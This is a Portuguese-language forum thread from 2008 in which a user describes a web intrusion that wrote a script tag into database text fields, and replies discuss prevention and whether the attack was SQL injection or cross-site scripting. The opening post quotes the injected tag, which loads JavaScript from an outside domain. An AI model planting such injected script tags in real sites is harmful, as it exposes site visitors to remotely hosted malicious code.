none
Problema Grave se injeção de SQL RRS feed

  • Pergunta

  •  

    Olá Pessoal,

     

    Estou com o seguinte problema, sofri uma invasão por um acesso Web que alterou diversas tabelas do banco de dados, em campos do tipo texto, inserindo o script:

     

    <script src=http://www.bigadnet.com/b.js></script>

     

     

    Alguém já passou por isso? Sabe como posso evitar?

    Obs: A base de dados já foi arrumada, o problema é como evitar para sofrer outro ataque novamente.

     

    Obrigada.

    sexta-feira, 13 de junho de 2008 18:02

Respostas

Todas as Respostas

  • Olá Ana Paula,
    Na empresa onde trabalho estamos tendo estes problemas, uma das alterações são TRACE do IIS ligado, para que você consiga saber por onde que invadiram, e após saber isto, revise TODOS os seus códigos para a prevenção da mesma....
    Mantenha sempre backup da base de dados, e das paginas!

    Abraços,
    Nícolas Tarzia
    Microsoft Student Partner
    segunda-feira, 23 de junho de 2008 03:23


  • Ola,

     Pelo que eu entendi vc sofreu um ataque do tipo  "Cross Site Scripting"  e nao de Sql Injection ,que quer dizer que pra vc evitar esse tipo de ataque vc nao pode deixar a sua aplicação execultar um script que foi inserido por um usuario ,ai existem varias formas de se fazer isso uma bem pratica é converter para HtmlEncode tudo que vc escreve na tela e que foi inserido por um usuario.
    sexta-feira, 27 de junho de 2008 21:54
  • quinta-feira, 16 de outubro de 2008 21:55
  •  Kassiano wrote:

    Pelo que eu entendi vc sofreu um ataque do tipo  "Cross Site Scripting"  e nao de Sql Injection ,que quer dizer que pra vc

     

    Pela descrição do problema, o ataque XSS foi feito através de SQL Injection, então são dois problemas para resolver...

    sexta-feira, 17 de outubro de 2008 03:02
  •  Caio Proiete [MCT] wrote:

     

    Pela descrição do problema, o ataque XSS foi feito através de SQL Injection, então são dois problemas para resolver...



    Pode até ser que a aplicação estava vulneravel desta maneira , porem acredito que o ataque que ela sofreu foi de xss que independe de qualquer vulnerabilidade no banco de dados, ou seja eu posso estar protegido contra sql injection e estar vulneravel em relação a xss e o contrario tambem vale , eu posso estar protegido conta xss e vulneravel contra sql injection...;

     Mas é possivel que aplicação estava vulneravel das duas maneiras...;

    att;

    sexta-feira, 17 de outubro de 2008 17:40